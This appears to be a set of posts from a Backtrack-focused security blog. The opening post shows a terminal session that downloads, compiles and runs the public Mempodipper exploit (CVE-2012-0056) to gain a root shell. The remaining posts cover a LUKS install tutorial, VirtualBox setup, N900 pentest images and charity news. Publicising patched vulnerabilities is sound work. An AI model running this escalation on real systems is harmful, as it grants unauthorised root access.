Backtrack 5 kernel whoops !!


Hackers For Charity

Backtrack 5, and apparently many other Linux kernels >= 2.6.39, can be exploited to get root via a Linux local privilege escalation through a SUID /proc/pid/mem write (CVE-2012-0056). Read more on the blog http://blog.zx2c4.com. Exploit code can be obtained here: http://www.exploit-db.com/exploits/18411/

chalo@bt:~$ uname -a
Linux bt 2.6.39.4 #1 SMP Thu Aug 18 13:38:02 NZST 2011 i686 GNU/Linux
chalo@bt:~$ wget -c http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
chalo@bt:~$ gcc -o sploit mempodipper.c
chalo@bt:~$ ./sploit
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/12634/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Ptracing su to find next instruction without reading binary.
[+] Resolved exit@plt to 0x8049a30.
[+] Calculating su padding.
[+] Seeking to offset 0x8049a24.
[+] Executing su with shellcode.
sh-4.1# whoami
root


Installing backtrack on encrypted partition with luks



Before you start, please note that this process will format any data you have. Have a full backup of your system before you begin. Be sober while you are doing this, please. I have tested this tutorial on backtrack 4 pre-final, backtrack 4 final, backtrack 5 and backtrack 5 r1.
Kindly note that my hard disk setup may be different from yours. I want to install backtrack as follows:

/dev/sda1 ----- /boot partition
/dev/sda2 ----- /root partition

My /root partition will be encrypted with luks such that, in order to boot, I will have to enter a password. Boot with a live cd and proceed as follows.
Kindly remember to change your partitions as necessary.

Format the /root partition with luks. Enter the password you want to use at startup.

root@bt:~# cryptsetup luksFormat /dev/sdXX

Open the partition for mounting. Enter the password you entered above.

root@bt:~# cryptsetup luksOpen /dev/sdXX root

Format the container with the ext3 filesystem. You can use whichever Linux filesystem you are comfortable with.

root@bt:~# mkfs.ext3 -j -O extent /dev/mapper/root

After this is done, run the backtrack installer (install.sh) on the backtrack desktop. Double clicking it should do.
Select your country.
Select the keyboard layout.

Then we go on to partition the disk. Select manual and click next.

Select the partition for boot, for me that's /dev/sda1. Click "edit partition" and then set the options. In my options, I use ext3 as the file system, I choose to format the partition, and the most important bit is that I set the mountpoint as /boot.

Select the partition for root, for me that's /dev/mapper/root. Click "edit partition" and then set the options. In my options, I use ext3 as the file system, I choose to format the partition, and the most important bit is that I set the mountpoint as /root.

My final setup for the install looks as below. I know, my hard disk is rather small :)

When you click next, you will get a warning about swapspace. I personally opt not to have swapspace; I have enough memory to run backtrack and a few virtual machines. Click "continue".

The next bit is important. Click "Advanced". This is the location where backtrack will install the bootloader. I usually install the bootloader to hd0, but you can install it to the Linux partition. Even if you have Windows, you can install the bootloader to hd0, and when it comes time to boot, you will be presented with options as to which OS to boot.

You are now set for the install. Click install and wait for the backtrack install to finish. After it's done, click "continue using the live cd".
We need to make a few changes before we exit the live cd.

root@bt:~# mkdir /mnt/root
root@bt:~# mount /dev/mapper/root /mnt/root/

Mount the /boot partition, then proc and /dev, and chroot into the installed system.

root@bt:~# mount /dev/sdXX /mnt/root/boot
root@bt:~# mount -t proc proc /mnt/root/proc/
root@bt:~# mount -o bind /dev /mnt/root/dev/
root@bt:~# chroot /mnt/root/ /bin/bash

Using a text editor like vi or nano, edit /etc/crypttab and add the /root partition here.

root /dev/sdXX none luks

Using a text editor like vi or nano, edit the /etc/fstab file. Remove any other lines you find and leave your file in the order below. Replace the XX with your partitions.

/dev/mapper/root / ext3 relatime,errors=remount-ro 0 1
/dev/sdXX /boot ext3 defaults 0 0

Using a text editor like vi or nano, edit the /etc/initramfs-tools/modules file and add the following modules to the end of the file.

aes-i586
sha256
dm-mod
dm-crypt

Create the new initrd image.

root@bt:~# update-initramfs -k all -c

Install grub to your hard disk. Use the device name and not a partition, e.g. /dev/sda.

root@bt:~# grub-install /dev/sdX

root@bt:~# exit

root@bt:~# reboot

Your /root partition should now be encrypted and you will be asked a password when booting to decrypt it.
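The chroot-side steps above (crypttab, fstab, initramfs modules) as reusable shell functions, added here as an example and not part of the original post. It assumes the post's layout (mapper name "root", ext3 on both partitions, an i686 kernel for aes-i586) and takes the target mount point as a parameter, so you can generate the files into a scratch directory and inspect them before writing into /mnt/root.

```shell
#!/bin/sh
# Added example (not part of the original post): the chroot-side configuration
# steps from this tutorial as reusable functions. Assumes the same layout as the
# post: mapper name "root", ext3 on both partitions, i686 kernel (aes-i586).
# ROOT_DIR is the mounted target (/mnt/root on the live cd); passing a scratch
# directory lets you inspect the generated files before touching the real one.
set -eu

# write_crypttab ROOT_DIR LUKS_DEV -> /etc/crypttab with the single luks mapping
write_crypttab() {
    mkdir -p "$1/etc"
    printf 'root %s none luks\n' "$2" > "$1/etc/crypttab"
}

# write_fstab ROOT_DIR BOOT_DEV -> / on the mapper device, /boot on BOOT_DEV
write_fstab() {
    mkdir -p "$1/etc"
    {
        printf '/dev/mapper/root / ext3 relatime,errors=remount-ro 0 1\n'
        printf '%s /boot ext3 defaults 0 0\n' "$2"
    } > "$1/etc/fstab"
}

# add_initramfs_modules ROOT_DIR -> append each needed module once, so a second
# run does not duplicate lines in /etc/initramfs-tools/modules
add_initramfs_modules() {
    modfile="$1/etc/initramfs-tools/modules"
    mkdir -p "$1/etc/initramfs-tools"
    touch "$modfile"
    for m in aes-i586 sha256 dm-mod dm-crypt; do
        grep -qx "$m" "$modfile" || printf '%s\n' "$m" >> "$modfile"
    done
}

# check_config ROOT_DIR -> succeeds only if the crypttab mapper name is the
# device fstab mounts on /; a mismatch here leaves the system unbootable
check_config() {
    name=$(awk 'NR==1{print $1}' "$1/etc/crypttab")
    grep -q "^/dev/mapper/$name / " "$1/etc/fstab"
}

# configure_target ROOT_DIR LUKS_DEV BOOT_DEV -> all of the above; run
# update-initramfs and grub-install afterwards as in the post
configure_target() {
    write_crypttab "$1" "$2"
    write_fstab "$1" "$3"
    add_initramfs_modules "$1"
    check_config "$1"
}
```

Inside the chroot the call is `configure_target / /dev/sda2 /dev/sda1` for the layout in this post; from the live cd before chrooting it is `configure_target /mnt/root /dev/sda2 /dev/sda1`.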

Credits to esc201, who wrote a good tutorial on encrypting the disk with bt4-prefinal.


Swag 2.0 Beta



Went to Uganda, met Johnny; I'll let the pictures say the rest. But this beats cool on so many levels. Thanks for the wonderful time and gifts. He also gave me a coin and the badge for defcon, not included now because they are with a pal. Enjoy the gallery. It's an honor for me.

And Johnny is back. What do I mean? He is back to security. Watch this small space. It was a nice catchup; we spoke of the sweetness of the pwnphone amongst other good things. He is ok. Please remember donating to HFC. Ok, enough talk.

Look at this cool dirty security t-shirt. Actually I had to put it on on my way back. This just rocks.

And a backtrack revolution shirt from the offsec team. Oh my..

And this hackers for charity defcon shirt to top up the collection. This made heads turn in Nairobi when I put it on.


To pwn with pwnimage or not to on the nokia n900



Pwnie Express has just released the pwnimage for the nokia n900 to the community: http://www.pwnieexpress.com/pwn_phone.html The pwnimage is an easy-to-use customized n900 suited for pentests. It contains some of the tools you would find in backtrack. I got some time today and installed the image on my phone. Below is a screenshot. The question I have is: do I use this pwnimage or do I use my manually customized n900?

Reasons for the pwnimage
The image comes with preinstalled tools and easy-to-use shortcuts on the desktop that start applications fast, such as wifizoo, packet injection, sslstrip, metasploit, nmap, fake ap etc. This saves time for any pentester. With just a single click most of these tools will run. It's awesome.

Reasons against pwnimage
There is a licence agreement that you cannot reverse engineer the software etc., which is a little peculiar because most of this software is under the GNU or BSD licence.
I try to be paranoid, not running on not-so-common platforms because of backdoors, etc.

My conclusion: I will use the pwnimage. First, it is a really good idea to have your n900 set up in such an easy mode to pwn for any pentest. I remember when backtrack v1 was released back then, some people argued that you could compile all those packages alone. Right now backtrack is the most widely used pentesting distro. It's not that I cannot run ./configure;make;make install or apt-get install, and I love spending some sleepless nights trying to tweak my n900; it's just that the time saved matters, and bringing all these packages together to work perfectly takes skill and takes time.
Several projects have come up, such as Neopwn, which was a little hyped up but we haven't seen anything come out of it. I can run backtrack 5 on my n900 but it is a little too slow and the screen calibration on my n900 is really not working perfectly.
Aside from the fears, I know if we the "community" can really pick up this pwnimage and improve it, I'm sure there are better things in the future for the n900. Thanks to Pwnie Express for releasing this. I choose to pwn.


Pimped by Hackers For Charity



Just back from Uganda where I had gone for some business and also took time to visit Johnny Long. He is doing well and his family is ok, although he really needs your support. Today is the last day to vote for Drobos, so keep voting for HFC. http://www.hackersforcharity.org/hackers-for-charity/saving-lives-1-drobo-at-a-time/
I also saw Sophos challenging LulzSec to follow in the way of Johnny Long. Wouldn't that be something. http://nakedsecurity.sophos.com/2011/06/16/lulzsec-hackers-heres-a-real-challenge/
It is always a pleasure meeting such a great and humble person like Johnny. Apart from catching up with Johnny, he gave me so much gear and swag. Here are some photos.

Johnny on "the beast". He was beaten to the finish line by the guy on the far left carrying two bags of charcoal. :) It's now easier to navigate Jinja with this bike. It was a miracle how Johnny got it; I guess he will soon blog about it.

Johnny's presentation badge for Shmoocon :) and notice the cool red blackhat bag.

Shmoo mouse pad

Some hardware hacking stuff; you had to program it to read "ninja party" to be allowed into the party.

This shirt is to kill for.. literally. It is a collector's item that has a different logo at the back. It was specifically for the Shmoocon conference. I am honored to get this.

HFC stickers to spread the word to all the world.


Installing VirtualBox on Backtrack 5



Backtrack 5 doesn't come with the kernel headers installed, so you will need to download them and then proceed with installing VirtualBox. The commands are listed below.

root@bt # prepare-kernel-sources
root@bt # cd /usr/src/linux
root@bt # cp -rf include/generated/* include/linux/

After this is done, edit /etc/apt/sources.list as shown below and download VirtualBox.

root@bt # echo deb http://download.virtualbox.org/virtualbox/debian lucid contrib non-free >> /etc/apt/sources.list

root@bt # wget -q http://download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -O- | sudo apt-key add -

root@bt # apt-get update

root@bt # apt-cache search virtualbox

root@bt # apt-get install virtualbox-4.0
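The repository setup above, written as an added example (not from the original post) so it can be rerun without stacking duplicate lines in sources.list, and with a fingerprint check on the downloaded signing key before it is handed to apt-key. The key is fetched over plain http in the post, so its fingerprint is the only thing tying it to the VirtualBox project; EXPECTED_FPR is a placeholder to be filled in from the project's published fingerprint, and the gpg listing call is assumed to be available on the live system.

```shell
#!/bin/sh
# Added example, not from the original post: the repository setup from this
# post made safe to rerun, plus a fingerprint check on the downloaded signing
# key before it is handed to apt-key. The key is fetched over plain http in the
# post, so the fingerprint is the only thing tying it to the VirtualBox project.
# EXPECTED_FPR is a placeholder: fill in the fingerprint published by the
# project (checked out of band) before using this for real.
set -eu

VBOX_LINE='deb http://download.virtualbox.org/virtualbox/debian lucid contrib non-free'
EXPECTED_FPR='REPLACE WITH PUBLISHED FINGERPRINT'

# ensure_apt_source FILE LINE -> append LINE only if FILE does not already
# contain it, so repeated runs do not stack duplicate "deb" lines
ensure_apt_source() {
    touch "$1"
    grep -qxF -- "$2" "$1" || printf '%s\n' "$2" >> "$1"
}

# normalize_fpr STRING -> uppercase hex with whitespace removed, so a
# fingerprint copied from a web page compares equal to gpg's output
normalize_fpr() {
    printf '%s' "$1" | tr -d ' \t\n' | tr 'a-f' 'A-F'
}

# fingerprint_matches ACTUAL EXPECTED -> 0 only if both are the same
# 40-hex-digit value (a short or empty ACTUAL never matches)
fingerprint_matches() {
    a=$(normalize_fpr "$1"); e=$(normalize_fpr "$2")
    [ ${#a} -eq 40 ] && [ "$a" = "$e" ]
}

# import_key_if_trusted KEYFILE -> add the key to apt only when its fingerprint
# (read from gpg's colon-separated listing, assumed available) matches EXPECTED_FPR
import_key_if_trusted() {
    actual=$(gpg --with-colons --with-fingerprint "$1" 2>/dev/null \
             | awk -F: '$1=="fpr"{print $10; exit}')
    if fingerprint_matches "$actual" "$EXPECTED_FPR"; then
        apt-key add "$1"
    else
        echo "refusing to trust $1: fingerprint '$actual' does not match" >&2
        return 1
    fi
}

# Usage on the box, replacing the wget | apt-key add pipeline from the post:
# wget -q http://download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -O /tmp/oracle_vbox.asc
# import_key_if_trusted /tmp/oracle_vbox.asc && ensure_apt_source /etc/apt/sources.list "$VBOX_LINE"
```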


Backtrack5 on the nokia n900



Just managed to get my sweet nokia n900 phone to run Bt5 :). For me to write a tutorial on this would be an injustice because the steps have been documented properly in this blog: http://pcsci3nce.info/?p=177

Below is a screenshot of my phone.
